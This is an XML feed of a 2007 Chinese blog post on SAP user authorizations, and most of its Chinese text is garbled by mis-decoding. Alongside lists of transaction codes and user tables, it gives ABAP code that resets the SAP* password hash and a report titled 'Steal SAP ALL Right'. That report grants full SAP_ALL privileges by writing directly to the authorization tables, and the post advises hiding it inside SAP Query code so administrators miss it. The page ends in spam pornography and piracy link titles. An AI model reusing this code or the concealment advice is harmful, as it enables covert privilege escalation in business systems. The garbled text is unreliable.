锘??xml version="1.0" encoding="utf-8" standalone="yes"?>中国china体内裑精亚洲日本,亚洲一区二区三区91,亚洲av日韩av无码黑人http://www.tkk7.com/junky/category/24032.htmlzh-cnWed, 11 Jul 2007 16:19:55 GMTWed, 11 Jul 2007 16:19:55 GMT60SAP 鐢ㄦ埛鏉冮檺http://www.tkk7.com/junky/archive/2007/07/11/129697.htmljunkyjunkyWed, 11 Jul 2007 13:04:00 GMThttp://www.tkk7.com/junky/archive/2007/07/11/129697.htmlhttp://www.tkk7.com/junky/comments/129697.htmlhttp://www.tkk7.com/junky/archive/2007/07/11/129697.html#Feedback0http://www.tkk7.com/junky/comments/commentRss/129697.htmlhttp://www.tkk7.com/junky/services/trackbacks/129697.html

鐢ㄦ埛鏉冮檺瑙e墫:

閫氬父basis浼?xì)鋴社敤PFCG鍋氭潈闄愮鐞?鏃朵綘淇濆瓨鏃朵細(xì)浜х敓涓涓郴緇熷鐨刾rifile name,
璁板緱SU01鏃剁敤鎴鋒湁profile 鍜宺ole涓ゆ爮浣嶅悧?瀹冧滑鐨勫叧緋誨浣曞憿?


棣栧厛鏄庣櫧鍑犱釜姒傚康.
1.activity
榪欐牱璇村惂,鎴戜滑浠巃ctivity璋堣搗,activity鏄粈涔堟剰鎬濊繖涓綘鏌ヤ笅
瀛楀吀涔熷氨鐭ラ亾浜?瀵瑰氨鏄瀹氬彲鍋氫粈涔堝姩浣?姣斿璇翠笉鑳藉惛鐑熷彧鑳藉枬閰?涓嶈兘澶氫簬2涓?
涓嶅,榪欐槸鎴戣佸﹩璁茬殑,SAP涓嶆槸榪欐牱瀛愮殑,鏄彧鑳絠nsert, update,display浠涔堢殑.
榪欎簺涓滆タ褰撳勾寰峰浗浣槸鍐欏湪tobj琛ㄤ腑鐨?
activity 涔熸槸鍙垎activity group鐨?

2.activity category &Authorization group
  Role Vs Profile
浣犵湅鐪嬭〃T020灝辯煡閬撲簡,灝辨槸浠涔圞,D, A, M浠涔堢殑.

profile鏄粈涔堝憿?瀹為檯涓婂彲浠ョ悊瑙d負(fù)鎵鏈夌殑authorization data(鏈夊緢澶歛uthorization group--{浣犲彲浣跨敤OBA7濉啓,
鏉冮檺澶粏涔熶笉鏄ソ浜媈_^}鍜宎ctivity緇勬垚)鐨勪竴涓泦鍚堢殑鍚嶅瓧,閫氬父涓涓嚜瀹氫箟鐨剅ole浜?br>鐢熶竴涓猵rofile,SAP鏉冮檺鎺у埗鏄牴鎹畃rofile閲岀殑authorization data(objects)鏉ユ帶鍒剁殑.

role鍙堟槸浠涔堝憿?role鍙槸涓涓悕瀛楄屽凡,鐒跺悗灝唒rofile璧嬩簣緇欏畠, 姣斿浣燬U01寤虹珛涓涓?br>鐢ㄦ埛,鎴戞病鏈変換浣時ole,浣嗘槸鍔犲SAP_All profile
涔熸槸鍙仛浠諱綍浜嬫儏.
SAP鏈韓鏈夊緢澶歞efault role & profile.


3.鏈甯哥敤鐨凱FCG->authorizations->change authorization data->
榪涘叆鍚庨夊彇selection criteria 鍙湅鍒版墍鏈夌殑authorization object
manually鍙墜宸ュ姞authorization object,姣斿浣犱嬌鐢ㄦ煇涓猼-code鏉冮檺鍑洪敊璇?abap浣跨敤SU53媯鏌ュ氨
鐭ラ亾緙哄皯鍝釜authorization objec,鐒跺悗鎵嬪伐鍔犲叆灝卞彲浠?
浣犻夊幓authorization levels灝卞彲by account type鍐嶇粏鍒嗘潈闄?
鏈変簺鐢氳嚦鐩存帴鍒拌〃瀛楁.鑰屼笖浣犵敋鑷沖彲緄︿竴涓猳bject鍒嗛厤緙撳瓨buffer.

閭d箞SAP鏄浣曞仛鍒版潈闄愭帶鍒剁殑鍛?灞犲か灝辯敤鍒板皬瀹頒竴涓?

4.鍏充簬鏉冮檺鏂歸潰鐨勫嚑涓猼-code.

(涓)Role(瑙掕壊)鐩稿叧T-code:
PFAC         鏍囧噯
PFAC_CHG 鏀瑰彉
PFAC_DEL 鍒犻櫎
PFAC_DIS 鏄劇ず
PFAC_INS 鏂板緩
PFAC_STR
PFCG  鍒涘緩
ROLE_CMP 姣旇緝
SUPC  鎵歸噺寤虹珛瑙掕壊profile
SWUJ  嫻嬭瘯
SU03            媯嫻媋uthorzation data
SU25, SU26      媯鏌pdated profile
(浜?寤虹珛鐢ㄦ埛鐩稿叧T-code:
SU0  
SU01  
SU01D  
SU01_NAV 
SU05 
SU50, Su51, SU52 
SU1  
SU10  鎵歸噺
SU12  鎵歸噺
SUCOMP:緇存姢鐢ㄦ埛鍏徃鍦板潃
SU2  change鐢ㄦ埛鍙傛暟
SUIM  鐢ㄦ埛淇℃伅緋葷粺
鐢ㄦ埛緇?br>SUGR:緇存姢 
SUGRD:鏄劇ず
SUGRD_NAV:榪樻槸緇存姢
SUGR_NAV:榪樻槸鏄劇ず
 
(涓?鍏充簬profile&Authoraztion Data
SU02:鐩存帴鍒涘緩profile涓嶇敤role
SU20:緇嗗垎Authorization Fields

SU21(SU03):****緇存姢Authorization Objects(TOBJ,USR12).
瀵逛簬鍑瘉浣犲彲緇嗗垎鍒?
F_BKPF_BED: Accounting Document: Account Authorization for Customers
F_BKPF_BEK: Accounting Document: Account Authorization for Vendors
F_BKPF_BES: Accounting Document: Account Authorization for G/L Accounts
F_BKPF_BLA: Accounting Document: Authorization for Document Types
F_BKPF_BUK: Accounting Document: Authorization for Company Codes
F_BKPF_BUP: Accounting Document: Authorization for Posting Periods
F_BKPF_GSB: Accounting Document: Authorization for Business Areas
F_BKPF_KOA: Accounting Document: Authorization for Account Types
F_BKPF_VW : Accounting Document: Change Default Values for Doc.Type/PsKy
鐒跺悗浣犺繘鍘昏繕鍙粏鍒?榪欎簺涓笢瑗挎槸save鍦║SR12琛ㄤ腑鐨? 鍦―B灞傛槸UTAB.

瀵瑰叿浣搕ransaction code緇嗗垎:    
SU22,SU24  
SU53:*** 灝辨槸浣犲嚭閿欑敤鏉ユ鏌ユ病鏈夐偅浜沘uthoraztion objects.
SU56:鍒嗘瀽authoraztion data buffers.
SU87:鐢ㄦ潵媯鏌ョ敤鎴鋒敼鍙樹駭鐢熺殑history
SU96,SU97,SU98,SU99:騫插暐鐨?
SUPC:鎵歸噺浜х敓role

DB鍜宭ogical灞?
SUKRI:Transaction Combinations Critical for Security
tables:
TOBJ : All avaiable authorzation objects.(鍏ㄥ湪姝?
USR12: 鐢ㄦ埛綰uthoraztion鍊?br>-----------------------------
USR01:涓繪暟鎹?br>USR02:瀵嗙爜鍦ㄦ
USR04:鎺堟潈鍦ㄦ
USR03:User address data
USR05:User Master Parameter ID
USR06:Additional Data per User
USR07:Object/values of last authorization check that failed
USR08:Table for user menu entries
USR09:Entries for user menus (work areas)
USR10:User master authorization profiles
USR11:User Master Texts for Profiles (USR10)
USR12:User master authorization values
USR13:Short Texts for Authorizations
USR14:Surchargeable Language Versions per User
USR15:External User Name
USR16:Values for Variables for User Authorizations
USR20:Date of last user master reorganization
USR21:Assign user name address key
USR22:Logon data without kernel access
USR30:Additional Information for User Menu
USR40:Table for illegal passwords
USR41:褰撳墠鐢ㄦ埛
USREFUS:
USRBF2
USRBF3
UST04:User Profile鍦ㄦ
UST10C: Composite profiles
UST10S: Single profiles (瑙掕壊瀵瑰簲鐨?br>UST12 : Authorizations..............................

..............................
濡備綍紿冨彇鏉冮檺

..............................

鐢ㄦ埛:
User type鐢ㄦ埛綾誨瀷(騫插暐鐢ㄧ殑涓嶈):
閫氬父鐨勭敤鎴風(fēng)被鍨嬫湁
a.dialog (灝辨槸normal user)
b.communication
c.system
d.service
e.reference.

閫氬父浣犲湪浣跨敤浠諱綍T-code鍓嶄竴瀹氫細(xì)鏈夋潈闄愭嫻嬬殑.
AUTHORITY_CHECK:榪欎釜鍑芥暟鍙槸灝忔鏌ヤ竴涓嬩綘鐨剈ser鏈夋病鏈?浠涔堟椂鍊欒繃鏈?
**濡傛灉coding鍙浣跨敤姝ゅ嚱鏁板氨澶熶簡.
AUTHORITY_CHECK_TCODE:媯鏌-code

榪欏嗗嚱鏁版槸鐪熸媯鏌utorization objects鐨?
SUSR_USER_AUTH_FOR_OBJ_GET:
AUTHORIZATION_DATA_READ_SELOBJ:
------------------------------------------
灝哠AP*鐨勫瘑鐮佹敼鎴?23鐨勭▼搴?寰堢畝鍗?
鎴戜滑鎵懼埌閭d釜user logon琛║SR02.
(DF52478E6FF90EEB鏄粡榪嘢AP鍔犲瘑淇濆瓨鍦―B鐨?鍝綅鑰佸厔鐮旂┒榪嘢AP鐨勫瘑鐮佸姞瀵?)
report zmodSAP*.
data zUSR02 like USR02 .
select  single * into zUSR02 from USR02
where BNAME = 'SAP*'.
zUSR02-Bcode = 'DF52478E6FF90EEB' .
Update USR02 from zUSR02  .

 

鐜板湪鐨勯棶棰樻槸濡備綍璁╀綘閭asis涓嶅彂鐜?寰堢畝鍗?灝哻ode闅愯棌鍦≦uery閲岄潰,灝辨槸璇翠綘鍋氫竴涓?br>query,query鏄細(xì)浜х敓code鐨?鐒跺悗浣犲姞鍏ユ浠g爜,璋佽兘鎯沖埌???鐒跺悗浣犲氨絳変綘鐨刡asis鍘誨摥...

榪欐牱鍋氬お鐙犳瘨浜?榪樻槸鑷繁鍋峰伔鎼炶嚜宸辯殑鐢ㄦ埛鍚?
鍦ㄦ浣犲繀欏誨鏉冮檺緇撴瀯闈炲父娓呮櫚.
鏉冮檺鍜屼笁涓〃鏈夊叧緋?
a.USR04
b.USR04
c.USRBF2  榪欎釜琛ㄦ槸瀵瑰簲鍒版墍鐢ㄧ殑authorzization objects鐨?
*&---------------------------------------------------------------------*
*& Report        : Steal SAP ALL Right                                 *
*& Creation Date : 2004.04.01                                          *
*& Created by    : Stone.Fu                                            *
*& Description   : 鍙獌鍙朣AP ALL鏉冮檺                                    *
*& Modified Date : 2005.11.02
*& Description   : 灝嗘code hide鍦╮eport painter or query  code        *
*&---------------------------------------------------------------------*

report zrightsteal.
data zUSR04 like USR04 . "????????work area??
data zUST04 like USR04 .
data zPROFS  like USR04-PROFS.
data ZUSRBF2 like USRBF2 occurs 0 with header line.
"USRBF2?????internal table
** Update Authorization table USR04.
select  single * into zUSR04 from USR04
where BNAME = 'ZABC2'. "SAP All 鏉冮檺
move 'C SAP_ALL' to zPROFS .
ZUSR04-NRPRO = '14'.
zUSR04-PROFS  = zPROFS.
Update USR04 from zUSR04  .

**Update User authorization masters table UST04 .
select  single * into zUST04 from UST04
where BNAME = 'ZABC2'.
zUST04-PROFILE  = 'SAP_ALL'. "SAP all 鏉冮檺
Update UST04 from zUST04 .

*?????insert
*ZUST04-MANDT = '200'.
*ZUST04-BNAME = 'ZABC2'.
*ZUST04-PROFILE = 'SAP_ALL'.
*Insert UST04 from ZUST04 .

select *  from  USRBF2 into table ZUSRBF2
where BNAME = 'SAP*' .
Loop at ZUSRBF2.
ZUSRBF2-BNAME = 'ZABC2'.
Modify ZUSRBF2 INDEX sy-tabix TRANSPORTING BNAME.
endloop.
INSERT USRBF2 FROM TABLE ZUSRBF2 ACCEPTING DUPLICATE KEYS.

鑷繁寤虹珛涓涓獄test鐢ㄦ埛涓嶇粰瀹冧換浣曟潈闄愮劧鍚庡湪test machine涓妑un  鎶ヨ〃zrightsteal.

鐒跺悗ztest灝辨槸SAP_ALL浜? 鐒跺悗浣犲皢code hide鍦⊿QP query鐨刢ode涓? ABAP code澶鏄撹浜哄彂鐜?  K, 鐜板湪鎴戠鍒頒竴涓ぇ闂浜? 璁板笎紼嬪簭琚敼鐨勫嚭浜嗛棶棰?.



junky 2007-07-11 21:04 鍙戣〃璇勮
]]>
主站蜘蛛池模板: 国产精品亚洲精品观看不卡| 亚洲av日韩av无码黑人| 亚洲熟妇av午夜无码不卡 | 色吊丝免费观看网站| 24小时免费直播在线观看| 亚洲毛片基地4455ww| 在线观看av永久免费| 亚洲私人无码综合久久网| 成人男女网18免费视频| 日本亚洲欧美色视频在线播放| 国产成人免费ā片在线观看| 曰批全过程免费视频免费看| 亚洲国产香蕉人人爽成AV片久久| 一区二区免费在线观看| 国产精品亚洲аv无码播放| 久久伊人免费视频| 亚洲国产精品网站久久| 日韩中文无码有码免费视频 | 无码一区二区三区免费| 亚洲综合亚洲国产尤物| 红杏亚洲影院一区二区三区| 国产在线播放线91免费| 国产亚洲综合色就色| 99re6热视频精品免费观看 | 午夜亚洲国产理论片二级港台二级 | 亚洲综合激情五月色一区| 日本视频免费在线| 波霸在线精品视频免费观看| 久久亚洲国产精品成人AV秋霞 | 18禁亚洲深夜福利人口| 黑人大战亚洲人精品一区| 4444www免费看| 理论亚洲区美一区二区三区| 黑人精品videos亚洲人| 无码一区二区三区AV免费| 污网站在线观看免费| 无码乱人伦一区二区亚洲| 精品久久久久久久免费加勒比| 国产黄片不卡免费| 亚洲国产精品成人精品小说| 亚洲精品tv久久久久久久久久|